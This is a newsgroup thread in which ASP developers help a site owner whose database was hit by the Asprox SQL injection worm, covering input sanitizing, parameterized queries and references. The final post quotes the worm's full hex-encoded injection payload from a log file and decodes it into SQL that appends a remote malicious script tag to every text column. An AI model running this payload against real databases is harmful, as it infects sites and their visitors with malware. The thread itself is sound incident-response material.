Virus? >script src=http://www.westpacsecuresite.com/b.js<>/script< - Inetserver

<michael@lonelyprogrammer.com> wrote in message
news:bc613352-fae3-4bb6-95d2-e193043c79e9@m45g2000hsb.googlegroups.com...
> Hi all
>
> A client of mine is having a problem with their site and when I looked
> into the SQL database, I found that most text fields have been altered
> and appended with
>
> script src=http://www.westpacsecuresite.com/b.js/script
>
> I've taken out the < > so that this shows.
>
> Has anyone seen this? I've seen other sites on the net when I did a
> google search.
>
> http://www.google.com/search?q=%3Csc...e7&rlz=1I7GGLJ
>
> Has my server been hacked? Any one seen this?
>
> Thanks

Yes, it's a SQL Injection attack that is intended to run scripts on the
computer of anyone who visits your client's site, which download a Trojan
called Asprox. This is nearly always the result of poor programming
practice - failure to validate user input, use parameters and/or HTMLEncode
any user supplied values that are written to a web page.

--
Mike Brind
Microsot MVP - ASP/ASP.NET

Yep, you've received a nice SQL Injection attack.

So now you get to go through all your pages and find all the places where
you are accepting Request.QueryString and Request.Form values and start both
validating and sanitizing them.

Tedious and time consuming, but pretty easy. Just need to create some
sanitizing functions that you use all over the place.

I tend to use ones like this:

<%
Function SQLString( txt )
SQLString = "'" & Replace( txt, "'", "''" ) & "'"
End Function
Function SQLDate( dt )
If IsDate(dt) Then
dt = CDate(dt)
SQLDate = "'" & dt & "'"
Else
SQLDate = "NULL"
End If
End Function
Function SQLNumber( num )
If IsNumeric( num ) Then
SQLNumber = CSTR( CDBL( num ) )
Else
SQLNumber = "NULL"
End If
End Function
%>

And then you replace all your unprotected queries, such as
SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
with
SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " &
SQLNumber(id)

And so on.

Oh, yeah...and as Mike poointed out, even all that won't protect you from
people putting <SCRIPT> tags, etc., into (say) <TEXTAREA> input.

So unless you *NEED* to allow HTML in some text fields, use a regular
expression to strip it all out.

Hi...

Is there a way for people to be able to get all the table names in your
database using SQL Injection Attacks?

I'm asking since the attacker was able to add SCRIPT tags to tables that
aren't really even used on pages any more.

Thoughts?

Thanks
MU


"Old Pedant" wrote:

> Yep, you've received a nice SQL Injection attack.
>
> So now you get to go through all your pages and find all the places where
> you are accepting Request.QueryString and Request.Form values and start both
> validating and sanitizing them.
>
> Tedious and time consuming, but pretty easy. Just need to create some
> sanitizing functions that you use all over the place.
>
> I tend to use ones like this:
>
> <%
> Function SQLString( txt )
> SQLString = "'" & Replace( txt, "'", "''" ) & "'"
> End Function
> Function SQLDate( dt )
> If IsDate(dt) Then
> dt = CDate(dt)
> SQLDate = "'" & dt & "'"
> Else
> SQLDate = "NULL"
> End If
> End Function
> Function SQLNumber( num )
> If IsNumeric( num ) Then
> SQLNumber = CSTR( CDBL( num ) )
> Else
> SQLNumber = "NULL"
> End If
> End Function
> %>
>
> And then you replace all your unprotected queries, such as
> SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
> with
> SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " &
> SQLNumber(id)
>
> And so on.
>
>

Yes, it is possible. Grab a coffee:
http://www.ngssoftware.com/papers/ad..._injection.pdf

--
Mike Brind
MVP - ASP/ASP.NET

"MU" <MU@discussions.microsoft.com> wrote in message
news:54C50D13-329E-4F1F-A439-440282DB8969@microsoft.com...
> Hi...
>
> Is there a way for people to be able to get all the table names in your
> database using SQL Injection Attacks?
>
> I'm asking since the attacker was able to add SCRIPT tags to tables that
> aren't really even used on pages any more.
>
> Thoughts?
>
> Thanks
> MU
>
>
> "Old Pedant" wrote:
>
>> Yep, you've received a nice SQL Injection attack.
>>
>> So now you get to go through all your pages and find all the places where
>> you are accepting Request.QueryString and Request.Form values and start
>> both
>> validating and sanitizing them.
>>
>> Tedious and time consuming, but pretty easy. Just need to create some
>> sanitizing functions that you use all over the place.
>>
>> I tend to use ones like this:
>>
>> <%
>> Function SQLString( txt )
>> SQLString = "'" & Replace( txt, "'", "''" ) & "'"
>> End Function
>> Function SQLDate( dt )
>> If IsDate(dt) Then
>> dt = CDate(dt)
>> SQLDate = "'" & dt & "'"
>> Else
>> SQLDate = "NULL"
>> End If
>> End Function
>> Function SQLNumber( num )
>> If IsNumeric( num ) Then
>> SQLNumber = CSTR( CDBL( num ) )
>> Else
>> SQLNumber = "NULL"
>> End If
>> End Function
>> %>
>>
>> And then you replace all your unprotected queries, such as
>> SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
>> with
>> SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " &
>> SQLNumber(id)
>>
>> And so on.
>>
>>

The article cited by Mike is an excellent resource, but it fails to mention
the method used by the worm that attacked your system. You can read about it
in this link provided by Old Pedant:
http://isc.sans.org/diary.html?n&storyid=4294

This is a two-stage attack:
SQL Injection is used to determine database objects and insert the data the
bot wants to insert
Script Injection is used to cause client browsers to execute script injected
by the bot.

Here is my standard blurb about avoiding sql injection:


Your use of dynamic sql is leaving you vulnerable to hackers using sql
injection:
http://mvp.unixwiz.net/techtips/sql-injection.html
http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23

See here for a better, more secure way to execute your queries by using
parameter markers/tokens:
http://groups-beta.google.com/group/...e36562fee7804e

Personally, I prefer using stored procedures, or saved parameter queries
as
they are known in Access:

Access:
http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl

http://groups.google.com/groups?hl=e...tngp13.phx.gbl

SQL Server:

http://groups.google.com/group/micro...9dc1701?hl=en&


--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

Just an FYI I just looked at my log files (which I should have done in the
first place to see the point of entry) and the IP is 189.94.135.4 that is
hacking at the site.

He has a HUGE delcare statement in the URL post with a CAST function with
numbers. How can I convert the numbers in the CAST to see what he's trying
to do?

Thanks for all your help above.

MU


"Bob Barrows [MVP]" wrote:

> The article cited by Mike is an excellent resource, but it fails to mention
> the method used by the worm that attacked your system. You can read about it
> in this link provided by Old Pedant:
> http://isc.sans.org/diary.html?n&storyid=4294
>
> This is a two-stage attack:
> SQL Injection is used to determine database objects and insert the data the
> bot wants to insert
> Script Injection is used to cause client browsers to execute script injected
> by the bot.
>
> Here is my standard blurb about avoiding sql injection:
>
>
> Your use of dynamic sql is leaving you vulnerable to hackers using sql
> injection:
> http://mvp.unixwiz.net/techtips/sql-injection.html
> http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
>
> See here for a better, more secure way to execute your queries by using
> parameter markers/tokens:
> http://groups-beta.google.com/group/...e36562fee7804e
>
> Personally, I prefer using stored procedures, or saved parameter queries
> as
> they are known in Access:
>
> Access:
> http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl
>
> http://groups.google.com/groups?hl=e...tngp13.phx.gbl
>
> SQL Server:
>
> http://groups.google.com/group/micro...9dc1701?hl=en&
>
>
> --
> Microsoft MVP - ASP/ASP.NET
> Please reply to the newsgroup. This email account is my spam trap so I
> don't check it very often. If you must reply off-line, then remove the
> "NO SPAM"
>
>
>

Perhaps this will be helpful:
http://blogs.technet.com/neilcar/arc...rt-2-meat.aspx

MU wrote:
> Just an FYI I just looked at my log files (which I should have done
> in the
> first place to see the point of entry) and the IP is 189.94.135.4
> that is
> hacking at the site.
>
> He has a HUGE delcare statement in the URL post with a CAST function
> with
> numbers. How can I convert the numbers in the CAST to see what he's
> trying
> to do?
>
> Thanks for all your help above.
>
> MU
>
>
> "Bob Barrows [MVP]" wrote:
>
>> The article cited by Mike is an excellent resource, but it fails to
>> mention
>> the method used by the worm that attacked your system. You can read
>> about it
>> in this link provided by Old Pedant:
>> http://isc.sans.org/diary.html?n&storyid=4294
>>
>> This is a two-stage attack:
>> SQL Injection is used to determine database objects and insert the
>> data the
>> bot wants to insert
>> Script Injection is used to cause client browsers to execute script
>> injected
>> by the bot.
>>
>> Here is my standard blurb about avoiding sql injection:
>>
>>
>> Your use of dynamic sql is leaving you vulnerable to hackers using
>> sql
>> injection:
>> http://mvp.unixwiz.net/techtips/sql-injection.html
>> http://www.sqlsecurity.com/DesktopDefault.aspx?tabid=23
>>
>> See here for a better, more secure way to execute your queries by
>> using
>> parameter markers/tokens:
>> http://groups-beta.google.com/group/...e36562fee7804e
>>
>> Personally, I prefer using stored procedures, or saved parameter
>> queries
>> as
>> they are known in Access:
>>
>> Access:
>> http://www.google.com/groups?hl=en&l...TNGP12.phx.gbl
>>
>> http://groups.google.com/groups?hl=e...tngp13.phx.gbl
>>
>> SQL Server:
>>
>> http://groups.google.com/group/micro...9dc1701?hl=en&
>>
>>
>> --
>> Microsoft MVP - ASP/ASP.NET
>> Please reply to the newsgroup. This email account is my spam trap so
>> I
>> don't check it very often. If you must reply off-line, then remove
>> the "NO SPAM"

--
Microsoft MVP - ASP/ASP.NET
Please reply to the newsgroup. This email account is my spam trap so I
don't check it very often. If you must reply off-line, then remove the
"NO SPAM"

MU wrote:
> He has a HUGE delcare statement in the URL post with a CAST function
> with numbers. How can I convert the numbers in the CAST to see what
> he's trying to do?

Consider this line of logfile:

2008-06-26 07:33:43 xxx.xxx.xxx.xxx - W3SVCN YOURSERVER yyy.yyy.yyy.yyy 80
POST /path/script.asp
id=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006A0038006A0038006800650069002E0063006E002F006B002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--|-|ASP_0113|Script_timed_out
500 0 112 2443 302781 HTTP/1.1 your.host.header
Mozilla/3.0+(compatible;+Indy+Library) -


Grab everything from the first semicolon to the last, and change [EXEC(@S)]
to [SELECT @S]. Execute against any SQL Server, and examine the result:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
src=http://www.j8j8hei.cn/k.js></script>''')FETCH NEXT FROM Table_Cursor
INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor



--
Dave Anderson

Unsolicited commercial email will be read at a cost of $500 per message. Use
of this email address implies consent to these terms.